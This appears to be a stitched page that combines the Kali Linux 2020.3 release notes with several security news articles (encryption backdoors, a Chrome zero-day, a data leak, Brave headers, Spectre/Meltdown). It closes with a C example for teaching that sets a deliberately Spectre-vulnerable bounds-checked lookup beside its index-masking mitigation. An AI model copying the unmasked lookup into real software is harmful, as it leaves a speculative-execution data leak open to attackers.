Having Kali Linux on “Windows Subsystem for Linux” (WSL) is something we have been taking advantage of since it came out. With the release of WSLv2, the overall functionality and user experience improved dramatically. Today, the experience is improving once more with the introduction of Win-KeX (Windows + Kali Desktop EXperience). After installing it, typing in kex, or clicking on the button, Win-KeX will give you a persistent-session GUI.

After getting WSL installed (there are countless guides online, or you can follow ours), you can install Win-KeX by doing the following:

sudo apt update && sudo apt install -y kali-win-kex

Afterwards, if you want to make a shortcut, follow our guide, or you can just type in kex!

On the subject of WSL (and this is true for Docker and AWS EC2), something we have seen a bit is that after getting a desktop environment, people have noticed the tools are not “there”. This is because they are not included by default, to keep the image as small as possible. You either need to manually install them one by one, or grab the default metapackage to get all the tools out of the box:

sudo apt install -y kali-linux-default

Please note, Win-KeX does require WSL v2 on x64 as it’s not compatible with WSL v1, or arm64. For more information, please see our documentation page.

Automating HiDPI

HiDPI displays are getting more and more common. Unfortunately, Linux support out of the box hasn’t been great (older Linux users may remember a time when this was very common for a lot of hardware changes). Which means after doing a fresh install, there is a bit of tweaking required to get it working, otherwise the font/text/display may be very small to read. We have had a guide out explaining the process required to get it working, but the process before was a little “fiddly”. We wanted to do better. So we made kali-hidpi-mode. Now, either typing in kali-hidpi-mode or selecting it from the menu (as shown in the original post) should automate switching between HiDPI modes.

Tool Icons

Over the last few releases, we have been showing the progress on getting more themed icons for tools. We can now say, if you use the default tool listing (kali-linux-default), every tool in the menu (and then a few extra ones!) should have its own icon now. We will be working on adding missing tools to the menu (and creating icons for them) over the next few releases of Kali, as well as expanding into the kali-linux-large metapackage (then kali-tools-everything). We also have plans for these icons outside of the menu – more information in an upcoming release!

Kali NetHunter Bluetooth Arsenal

We are proud to introduce Bluetooth Arsenal by yesimxev from the Kali NetHunter team. It combines a set of Bluetooth tools in the Kali NetHunter app with some pre-configured workflows and exciting use cases. You can use your external adapter for reconnaissance, spoofing, listening to and injecting audio into various devices, including speakers, headsets, watches, or even cars. Please note that RFCOMM and RFCOMM tty will need to be enabled in kernels from now on to support some of the tools.

Kali NetHunter for Nokia Phones

Kali NetHunter now supports the Nokia 3.1 and Nokia 6.1 phones, thanks to yesimxev. Images are available on our download site. Please note that those images contain a “minimal Kali rootfs” due to technical reasons, but you can easily install all the default tools via sudo apt install -y kali-linux-default.

Setup Process

The full installer image has always had all the packages required for an offline installation, but if you installed a Kali Linux system with this image and without disabling the network, the installer would automatically run dist-upgrade during the install. This is done to make sure that you have the latest packages on first boot. And that step can take a very long time, especially a few months after a release when lots of updates have accumulated. Starting with 2020.3, we disabled the network mirror in the full installer so that you always get the same installation speed, and the same packages and versions for that release – just make sure to update after installing!

Whilst we were at it, we fixed another related issue. If you didn’t have network access (either voluntarily or otherwise) during installation, you would get an empty network repository (/etc/apt/sources.list). This means you would not be able to use apt to install additional packages. While there might be some users who will never have network, we believe that it’s best to actually configure that file in all cases. So that’s what we did. By default, any fresh installs going forward after 2020.3 will have network repositories pre-defined.

ARM Device Updates

We have (along with the work of Francisco Jose Rodríguez Martos, who did a lot of the back end changes) refreshed our build-scripts for our ARM devices. We pre-generated various different ARM images (as of 2020.3 – 19 images) to allow for quick download and deployment, but we have build scripts for more (as of 2020.3 – 39 images). If your device is not one of the ones that we release images for, you’ll need to use the scripts to self-generate the image.

Notable changes in ARM’s 2020.3 release:

- All of the ARM images come with the kali-linux-default metapackage installed, bringing them in line with the rest of our releases, so more tools are available when you first boot
- We have reduced the size of all our ARM images that are created, so downloads should be smaller. However, you will still need to use at least a 16GB sdcard/USB drive/eMMC
- Pinebook and Pinebook Pro images can now be used on either sdcard or eMMC
- The Pinebook image now has the WiFi driver built during image creation, instead of on first boot; this should speed up first boot time massively
- The Pinebook Pro has a change from the upstream firmware, which changes ccode=DE to ccode=all – this allows access to more 2.4GHz and 5GHz channels
- The 64-bit RaspberryPi images now have the RaspberryPi userland utilities built during image creation, so vcgencmd and various other utilities that were previously only available on the 32-bit image are now usable on 64-bit as well
- The ODROID-C2 image now uses the Kali kernel, instead of a vendor provided one. This means in the future, an apt dist-upgrade will get you kernel updates instead of waiting for a new Kali release
- The /etc/fstab file now includes the root partition via UUID; this should make it easier when trying to use a USB drive instead of sdcard on devices that support it

A few things which are work in progress:

- RaspberryPi images are using 4.19 kernels. We would like to move to 5.4, however nexmon isn’t working properly with it (as the new kernel requires firmware version >= 7.45.202) for which no nexmon patch exists yet
- There is a new USBArmory Mk2 build script. We don’t have the hardware to test it however, so we are looking for community feedback from anyone who is able to test it out
- The Veyron image will be released at a later date due to kernel issues that haven’t yet been tracked down

Desktop Environment

As there has been a minor update to Gnome, we have been taking advantage of some of the new settings:

- GNOME’s file manager nautilus has a new theme
- GNOME’s system-monitor now matches the colors and also has stacked CPU charts
- Improved the design for “nested headerbars” (for example, in the Settings window, where the left headerbar is joined with the side-navbar)

Community Shoutouts

A new section in the release notes, community shoutouts. These are people from the public who have helped Kali and the team for the last release. And we want to praise them for their work (we like to give credit where due!):

- Crash, who has been helping the community for some time now, thank you!
- FrangaL, who has been doing some great work with Kali Linux ARM, thank you!

Anyone can help out, anyone can get involved!

Download Kali Linux 2020.3

Fresh Images

So what are you waiting for? Start downloading already! Seasoned Kali Linux users are already aware of this, but for the ones who are not, we do also produce weekly builds that you can use as well. If you can’t wait for our next release and you want the latest packages when you download the image, you can just use the weekly image instead. This way you’ll have fewer updates to do. Just know these are automated builds that we don’t QA like we do our standard release images. But we gladly take bug reports about those images because we want any issues to be fixed before our next release.

Existing Upgrades

If you already have an existing Kali Linux installation, remember you can always do a quick update:

kali@kali:~$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
kali@kali:~$
kali@kali:~$ sudo apt update && sudo apt -y full-upgrade
kali@kali:~$
kali@kali:~$ [ -f /var/run/reboot-required ] && sudo reboot -f
kali@kali:~$

You should now be on Kali Linux 2020.3. We can do a quick check by doing:

kali@kali:~$ grep VERSION /etc/os-release
VERSION="2020.3"
VERSION_ID="2020.3"
VERSION_CODENAME="kali-rolling"
kali@kali:~$
kali@kali:~$ uname -v
#1 SMP Debian 5.7.6-1kali2 (2020-07-01)
kali@kali:~$
kali@kali:~$ uname -r
5.7.0-kali1-amd64
kali@kali:~$

NOTE: The output of uname -r may be different depending on the system architecture.

As always, should you come across any bugs in Kali, please submit a report on our bug tracker. We’ll never be able to fix what we don’t know is broken! And Twitter is not a Bug Tracker!

The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes

Bhagyashree R
07 Oct 2019
5 min read

Last week, the US, UK, and Australian governments wrote an open letter to Facebook urging it to drop end-to-end encryption from WhatsApp and halt its plans to implement end-to-end encryption across its other messaging platforms. The three governments asked the company to ensure “there is no reduction to user safety” and include “a means for lawful access to the content of communications to protect our citizens.”

The open letter is addressed to Mark Zuckerberg, Facebook’s CEO, and co-signed by US Attorney General William Barr, Acting Homeland Security Secretary Kevin McAleenan, United Kingdom Home Secretary Priti Patel, and Australia’s Minister for Home Affairs Peter Dutton.

This open letter to Facebook comes after the launch of a new “UK-US Bilateral Data Access Agreement.” This agreement aims to speed up electronic data access requests by their respective law enforcement agencies. It replaces the current process, called Mutual Legal Assistance, which requires law enforcement agencies to submit a request and get it approved by central governments, which can often take months or even years. The new process will only take a few weeks or even days.

Why the US, UK, and Australian governments are against end-to-end encryption

The three governments stated that though they realize the importance of strong encryption in processing services such as banking and commerce, end-to-end encryption would hinder the investigation of serious crimes. The letter reads, “We must find a way to balance the need to secure data with public safety and the need for law enforcement to access the information they need to safeguard the public, investigate crimes, and prevent future criminal activity.”

The letter does praise Facebook for reporting 16.8 million cases to the US National Center for Missing & Exploited Children (NCMEC), which was more than 90% of the 18.4 million total reports in 2018. It further states that Facebook’s own safety systems were able to identify 99% of the content Facebook takes action against, both for child sexual exploitation and terrorism. However, the governments believe that “the mere numbers cannot capture the significance of the harm to children.”

This is not the first time government officials have shown their dislike of end-to-end encryption. In 2017, Amber Rudd, the UK's home secretary, said after WhatsApp added end-to-end encryption, “We need to make sure that organizations like WhatsApp, and there are plenty of others like that, don't provide a secret place for terrorists to communicate with each other.” In December 2018, the Australian government passed a controversial anti-encryption law that allows law enforcement agencies to compel tech companies to hand over encrypted messaging data.

The governments have listed the following steps for Facebook and other similar companies:

- The system should be designed in such a way that the companies behind them are able to effectively act against any illegal content without hampering the safety of others.
- Allow law enforcement to get lawful access to content in a readable and usable format.
- Engage in consultation with governments and let those consultations influence companies’ design decisions.
- The proposed changes should not be implemented until the safety of users is fully ensured by tested and operational systems.

What privacy experts and users think about this open letter to Facebook

The Electronic Frontier Foundation (EFF), a non-profit that supports civil liberties and other legal issues pertaining to digital rights, called this act a “staggering attempt to undermine the security and privacy of communications tools used by billions of people." It said, "Facebook should not comply.” The organization further said that the three governments failed to take into account the “severe risks” associated with introducing backdoors.

https://twitter.com/EFF/status/1180978792052998145

The open letter to Facebook also did not sit well with several users. In a discussion on Hacker News, users expressed that it would be wrong to undermine the security of millions of law-abiding users in order to investigate the wrongdoers. A user commented, “Privacy isn't a trade-off against security, it's a necessary component of having security.” Another user added, “Criminal activities are exacerbated by the internet, it would be a lie to say no. But just like with cars, scooters, or any tech that's sufficiently democratized. They need a permit for a car? Why not just steal it? I need an identity to do shady stuff on the internet? Why not steal it? We cannot reason with malevolent forces, there is always going to be a way. And by that time, we compiled the data of everyone, centralized it all, and let govs that don't understand the implication collect those as if it was mere petrol or gold. We are putting everyone's lives at risk doing so, just wait until it leaks out or it starts getting sold. (ahem, oh wait !)”

Read the open letter to Facebook for more details.

Google releases patches for two high-level security vulnerabilities in Chrome, one of which is still being exploited in the wild

Vincy Davis
04 Nov 2019
3 min read

Last week, Google notified its users that the ‘stable channel’ desktop Chrome browser is being updated to version 78.0.3904.87 for Windows, Mac, and Linux and will be rolled out in the coming weeks. This comes after external researchers found two high-severity vulnerabilities in the Chrome web browser.

The first, a zero-day vulnerability assigned CVE-2019-13720, was found by two malware researchers, Anton Ivanov and Alexey Kulaev from Kaspersky, a private internet security solutions company. This vulnerability is present in Chrome’s PDFium library. Google has confirmed that this vulnerability “exists in the wild.” The other vulnerability, CVE-2019-13721, was found by banananapenguin and affects Chrome's audio component. No exploitation of this vulnerability has been reported so far.

Google has not revealed the technical details of either vulnerability: “Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.” Both are use-after-free vulnerabilities, a type of memory flaw that can be leveraged by attackers to execute arbitrary code.

The Kaspersky researchers have named the attacks exploiting CVE-2019-13720 Operation WizardOpium, as they have not been able to establish a definitive link between this activity and any known threat actor. According to Kaspersky, the exploit was delivered through a watering-hole-style injection on a Korean-language news portal. Malicious JavaScript code was inserted on the main page, which in turn loads a profiling script from a remote site. The main index page hosts a small JavaScript tag that loads the remote script; this script checks whether the victim’s system can be infected by comparing the browser’s user agent.

The Kaspersky researchers say, “The exploit used a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker a Use-After-Free (UaF) condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.” The attacker uses this vulnerability to perform numerous operations to allocate and free memory, along with other techniques, that eventually give the attackers an arbitrary read/write primitive. That primitive is then used to create a “special object that can be used with WebAssembly and FileReader together to perform code execution for the embedded shellcode payload.”

You can read Kaspersky’s detailed report for more information on the zero-day vulnerability.
TrueDialog’s unprotected database exposes millions of SMS messages containing two-factor codes, and more

Bhagyashree R
02 Dec 2019
2 min read
Last month, two security researchers, Noam Rotem and Ran Locar, found an unprotected database managed by TrueDialog. The database exposed tens of millions of SMS text messages exchanged between businesses and their customers.

TrueDialog is a US-based SMS text service provider for enterprise businesses and higher education. Its cloud-based texting platform enables users to send both one-to-one and bulk messages to customers.

What data TrueDialog’s database exposed

Along with millions of sent and received text messages, the database included phone numbers, marketing messages from businesses with discount codes, job alerts, and more. Some of the two-way messages had a unique conversation code with which anyone would be able to read the entire thread of a conversation.

What is concerning is that there were also text messages containing sensitive information. As per TechCrunch, the database included “two-factor codes and other security messages, which may have allowed anyone viewing the data to gain access to a person’s online accounts.” TechCrunch further shared that the database also included messages containing codes to access online medical services, password reset and login codes for sites including Facebook and Google, and usernames and passwords of TrueDialog’s customers.

TrueDialog took the database offline shortly after being contacted by TechCrunch. However, the company’s chief executive, John Wright, did not acknowledge the breach or give any clarity on whether TrueDialog will be informing its customers.

This is another case of companies being negligent with their customers’ data. In October this year, an Elasticsearch server allegedly belonging to two data enrichment companies exposed the personal information of nearly 1.2 billion users. In another case, security researcher Oliver Hough discovered that printing company Vistaprint left an online database containing customer interactions unencrypted.

Check out the report by Noam Rotem and Ran Locar to learn about the TrueDialog data leak in detail.
Brave Privacy Browser has a ‘backdoor’ to remotely inject headers in HTTP requests: HackerNews

Melisha Dsouza
11 Feb 2019
3 min read
Brave, the open source privacy-focussed browser, has allegedly introduced a ‘backdoor’ to remotely inject headers in HTTP requests that may track users, say users on HackerNews. Users on Twitter and HackerNews have expressed their concerns over the new update on custom HTTP headers added by the Brave team: https://twitter.com/WithinRafael/status/1094712882867011585

Source: HackerNews

A user on Reddit has explained this move as “not tracking anything, they just send the word "Brave" to the website whenever you visit certain partners of theirs. So for instance visiting coinbase.com sends an "X-Brave-Partner" custom header to coinbase.com.”

Brendan Eich, from the Brave team, has replied to this allegation saying that the ‘Update is not a "backdoor" in any event and is a custom header instead.’ He says the update is about custom HTTP headers that Brave sends to its partners, with fixed header values, and that there is no tracking hazard in the new update. He further stresses that Brave blocks 3rd party cookies and storage and 3rd party fingerprinting along with HSTS supercookies, thus assuring users that their privacy is preserved:

“I find it silly to assume we will "heel turn" so obviously and track our users. C'mon! We defined our model so we can't cheat without losing lead users who would see through it. That requires seeing clearly things like the difference between tracking and script blocking or custom header sending, though.”

Users have also posted on Hacker News that the Brave browser's Tracking Protection feature does not block tracking scripts from hostnames associated with Facebook and Twitter. The tracking_protection_service.h file contains a comment stating that a tracking protection white_list variable was created as a "Temporary hack which matches both browser-laptop and Android code".

Bleepingcomputer also reports that this whitelist variable is associated with code in the tracking_protection_service.cc file that adds various Facebook and Twitter hostnames to the whitelist so that they are not blocked by Brave's Tracking Protection feature. In response to this comment, Brave says that the issue was opened on September 8th, 2018 and developers decided to whitelist tracking scripts from Facebook and Twitter because blocking them would “affect the functionality of many sites”, including Facebook logins.

You can head over to Brendan’s Reddit thread for more insights on this update.
Kali Linux 2019.1 released with support for Metasploit 5.0

Sugandha Lahoti
19 Feb 2019
2 min read
Yesterday, Kali Linux’s first release for 2019 was announced. Kali Linux 2019.1 comes with a variety of changes and new features including support for Metasploit version 5.0, a kernel up to version 4.19.13, ARM updates, and numerous bug fixes.

Users with an existing Kali installation can upgrade using:

root@kali:~# apt update && apt -y full-upgrade

You can also download new Kali Linux ISOs directly from the official website or from the Torrent network.

What’s new in Kali Linux 2019.1?

Support for Metasploit 5.0

The new version of Kali Linux now supports Metasploit version 5.0, which was released last month. Metasploit 5.0 introduces multiple new features including Metasploit’s new database and automation APIs, evasion modules and libraries, expanded language support, improved performance, and more.

Kali Linux 2019.1 also includes updated packages for theHarvester, DBeaver, and more. theHarvester helps penetration testers in the early stages of a penetration test to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources. DBeaver is an SQL client and database administration tool.

Updates to ARM

The 2019.1 Kali release for ARM includes:

- An upgraded kernel (v4.19.13) that supports both Banana Pi and Banana Pro single board computers.
- Veyron has also been moved to a 4.19 kernel.
- The Offensive Security virtual machine and ARM images have also been updated to 2019.1.
- Raspberry Pi images have been simplified. Separate Raspberry Pi images are no longer provided for users with TFT LCDs because Kali 2019.1 now comes with re4son’s kalipi-tft-config script on all of them. To set up a board with a TFT, users can run ‘kalipi-tft-config’ and follow the prompts.

You can go through the changelog for the detailed bug fixes.
Seven new Spectre and Meltdown attacks found

Savia Lobo
15 Nov 2018
3 min read
A group of researchers recently disclosed seven additional attacks in the Spectre and Meltdown families. These seven attacks are said to impact AMD, ARM, and Intel CPUs to a certain extent. The researchers have presented the execution of these attacks in detail in their research paper titled ‘A Systematic Evaluation of Transient Execution Attacks and Defenses’.

2 Meltdown and 5 Spectre variants found

The 7 newly found attacks include 2 new Meltdown variants, namely Meltdown-PK and Meltdown-BR, and 5 new Spectre mistraining strategies for Spectre-PHT and Spectre-BTB attacks. The researchers said that these 7 new attacks had been overlooked and not investigated so far. The researchers successfully demonstrated all seven attacks with proof-of-concept code. However, experiments to confirm six other Meltdown attacks did not succeed.

The two new Meltdown attacks are:

- Meltdown-PK - bypasses memory protection keys on Intel CPUs
- Meltdown-BR - exploits the x86 bound instruction on Intel and AMD

The other Meltdown attacks, which the researchers tried and failed to exploit, targeted the following internal CPU operations:

- Meltdown-AC - tried to exploit memory alignment check exceptions
- Meltdown-DE - tried to exploit division (by zero) errors
- Meltdown-SM - tried to exploit the supervisor mode access prevention (SMAP) mechanism
- Meltdown-SS - tried to exploit out-of-limit segment accesses
- Meltdown-UD - tried to exploit the invalid opcode exception
- Meltdown-XD - tried to exploit non-executable memory

Source: A Systematic Evaluation of Transient Execution Attacks and Defenses

In order to understand the Spectre-type attacks, the researchers proposed a categorization based on, first, the prediction mechanism exploited, and second, the mistraining mechanism. They propose to combine all attacks that exploit the same microarchitectural element:

- Spectre-PHT: Exploits the Pattern History Table (PHT)
- Spectre-BTB: Exploits the Branch Target Buffer (BTB)
- Spectre-STL: Exploits the CPU's memory disambiguation prediction, specifically store-to-load forwarding (STLF)
- Spectre-RSB: Exploits the Return Stack Buffer (RSB)

According to ZDNet, “Based on the experiments, the researchers found three new Spectre attacks that exploit the Pattern History Table (PHT) mechanism and two new Spectre attacks against the Branch Target Buffer (BTB).” These are:

- PHT-CA-OP
- PHT-CA-IP
- PHT-SA-OP
- BTB-SA-IP
- BTB-SA-OP

Defenses for these new Spectre and Meltdown attacks

For the Spectre and Meltdown attack types, the researchers have categorized the defenses into three and two categories respectively.

For Spectre-type attacks, the defense categories are:

- Mitigating or reducing the accuracy of covert channels used to extract the secret data.
- Mitigating or aborting speculation if data is potentially accessible during transient execution.
- Ensuring that secret data cannot be reached.

For Meltdown-type attacks, the defense categories are:

- Ensuring that architecturally inaccessible data remains inaccessible on the microarchitectural level.
- Preventing the occurrence of faults.

The researchers said in the paper, “We have systematically evaluated all defenses, discovering that some transient execution attacks are not successfully mitigated by the rolled out patches and others are not mitigated because they have been overlooked. Hence, we need to think about future defenses carefully and plan to mitigate attacks and variants that are yet unknown”.

To know more about these newly found attacks and the related experiments in detail, head over to the research paper written by Claudio Canella et al.
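As an added example of the second Spectre defense category above (neutralizing speculation on an index that could reach secret data), and not code from the paper or the article: a bounds-checked lookup of the kind Spectre-PHT mistrains, beside the branchless index-masking mitigation modelled on the array_index_mask_nospec pattern used by the Linux kernel. The table contents and function names are constructed for this example, and the mask assumes the table length is below SIZE_MAX/2.

```c
#include <stddef.h>
#include <stdint.h>

#define TABLE_LEN 16
/* Constructed sample table standing in for any bounds-checked array. */
static const uint8_t table[TABLE_LEN] = {
    10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25
};

/* Vulnerable pattern (Spectre-PHT, bounds check bypass): once the PHT has been
 * trained with in-range indices, the CPU may transiently take the "in range"
 * path for an out-of-range idx and load table[idx] before the check resolves. */
uint8_t lookup_plain(size_t idx) {
    if (idx < TABLE_LEN)
        return table[idx];
    return 0;
}

/* Branchless mask: all ones when idx < len, zero when idx >= len.
 * (len - 1 - idx) wraps to a value with the top bit set exactly when
 * idx >= len (assumption: len < SIZE_MAX/2), so that bit is the flag. */
size_t index_mask_nospec(size_t idx, size_t len) {
    size_t out_of_range = (idx | (len - 1 - idx)) >> (sizeof(size_t) * 8 - 1);
    return out_of_range - 1;   /* 0 -> SIZE_MAX (keep idx), 1 -> 0 (clamp to 0) */
}

/* The index that is actually used once the mask is applied. */
size_t masked_index(size_t idx, size_t len) {
    return idx & index_mask_nospec(idx, len);
}

/* Hardened lookup: the architectural check stays, but even if the branch is
 * mispredicted the masked index can only be 0, so no out-of-bounds memory is
 * touched during transient execution. The empty asm keeps the compiler from
 * dropping the mask as "redundant" after the check. */
uint8_t lookup_masked(size_t idx) {
    if (idx >= TABLE_LEN)
        return 0;
    __asm__ __volatile__("" : "+r"(idx));
    idx = masked_index(idx, TABLE_LEN);
    return table[idx];
}
```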